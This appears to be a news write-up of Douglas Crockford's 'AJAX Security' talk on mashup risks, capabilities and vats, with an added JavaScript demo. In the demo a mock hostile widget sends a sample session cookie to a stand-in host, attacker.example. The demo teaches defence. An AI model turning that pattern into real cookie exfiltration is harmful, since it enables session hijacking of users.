Douglas Crockford, the creator of JSON, gave a talk entitled "AJAX Security" at the recent Web Directions South conference. In this talk, Crockford discussed some of the security concerns with AJAX applications and what can be done to address them.
Crockford emphasised that the main security concern with Ajax is the browser itself: its security model was not designed for the Ajax applications of today. The popularity of Ajax has given rise to mashups, which in turn introduce a new security risk. A page that loads scripts from more than one source is immediately insecure, said Crockford, because the browser cannot distinguish parties with conflicting interests within a single page, so any one of those sources can mount what amounts to an XSS attack. External sources such as ads, widgets and Ajax libraries possess exactly the same rights as the website's own scripts.
If an attacker manages to inject a script into your web page, they can:
- Fetch more scripts from anywhere else
- Send requests to your server, which cannot tell that the request did not originate from your application
- See what the user sees
- Trick the user into giving away information, since the user cannot tell that the request did not come from your application
- Send information to any other servers
Crockford contrasted this with the capability model, in which holding a reference to an object is the only authority needed to use it. A reference can be obtained in just three ways:
- Creation: the function that creates an object holds the first reference to it
- Construction: a reference is obtained by invoking an object's constructor
- Introduction: an object that already holds references to two other objects passes one of them to the other. A reference handed over this way is what the model calls a capability.
Vat architecture is an interesting concept whose aim is to make mashups more secure. The idea is to put different programs into separate containers, or vats, where they run without interfering with each other. Communication between vats is restricted to explicitly granted capabilities, so a compromised vat can reach only what it was deliberately given. Apparently, Google Gears will provide a feature like this.
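To make the contrast between the two models concrete, here is an added example that is not part of Crockford's talk or this article: a plain JavaScript sketch that runs the same third-party widget once with ambient authority (the list of things an injected script can do above) and once with a narrowed capability object obtained by introduction (the three ways of acquiring a reference, and the restricted communication a vat would allow). Every name in it (makeHost, grantWidgetCaps, AuditLog, maliciousWidget, the sample cookie and the URLs) is an assumption made for illustration.

```javascript
"use strict";

// Added example, not code from the talk. All names, the sample cookie value
// and the URLs below are constructed for illustration.

// Creation: the function that builds these objects holds their first reference.
function makeHost() {
  const cookies = { session: "s3cr3t-session-id" }; // constructed sample secret
  const sent = [];                                   // record of outbound requests

  // Ambient authority: one object through which everything on the page is
  // reachable, the way `window` is in a browser. Any script that gets it gets it all.
  const ambient = {
    cookies,
    send(url, body) { sent.push({ url, body }); return true; },
  };

  // Attenuated capability: a private box to render into and a single fixed
  // endpoint to post to. Nothing reachable from here leads back to `cookies`.
  function grantWidgetCaps(boxName) {
    const box = { name: boxName, text: "" };          // Creation, again
    return Object.freeze({
      render(text) { box.text = String(text); return box.text; },
      post(body) { sent.push({ url: "/widget-api", body }); return true; },
    });
  }

  return { ambient, grantWidgetCaps, sent };
}

// Construction: invoking a constructor is the other way to obtain a fresh reference.
class AuditLog {
  constructor() { this.entries = []; }
  note(msg) { this.entries.push(msg); return this.entries.length; }
}

// A third-party widget with a hidden agenda: it renders something harmless,
// then tries to reach the session cookie and ship it off-site.
function maliciousWidget(api) {
  if (typeof api.render === "function") api.render("hello from the widget");
  const cookies = api.cookies;                       // undefined under capabilities
  if (cookies && typeof api.send === "function") {
    api.send("https://attacker.example/collect", cookies.session);
    return cookies.session;                          // exfiltration succeeded
  }
  return null;                                       // no reference path to the secret
}

// Run the same widget under both models and report what it managed to do.
function runScenario() {
  const host = makeHost();
  const log = new AuditLog();

  // Today's browser: the widget is handed the whole page.
  const leakedAmbient = maliciousWidget(host.ambient);
  log.note(`ambient: leaked=${leakedAmbient}`);

  // Capability model: the widget is introduced only to a narrowed object.
  const caps = host.grantWidgetCaps("ad-slot-1");
  const leakedCaps = maliciousWidget(caps);
  log.note(`caps: leaked=${leakedCaps}`);

  const offsite = host.sent.filter((r) => r.url.startsWith("https://attacker.example"));
  return {
    leakedAmbient,                   // "s3cr3t-session-id"
    leakedCaps,                      // null
    offsiteRequests: offsite.length, // 1, from the ambient run only
    auditEntries: log.entries.length,
  };
}
```

The widget steals the cookie in the first run and comes up empty in the second, not because it was checked or blocked, but because no chain of references leads from what it was given to the secret. The caveat a practitioner needs is the one Crockford's argument turns on: in a real browser every script can reach `window`, `document` and `XMLHttpRequest` as globals, so a frozen capability object on its own changes nothing; the hostile script must be denied those globals altogether, which is exactly what separating programs into vats is meant to achieve.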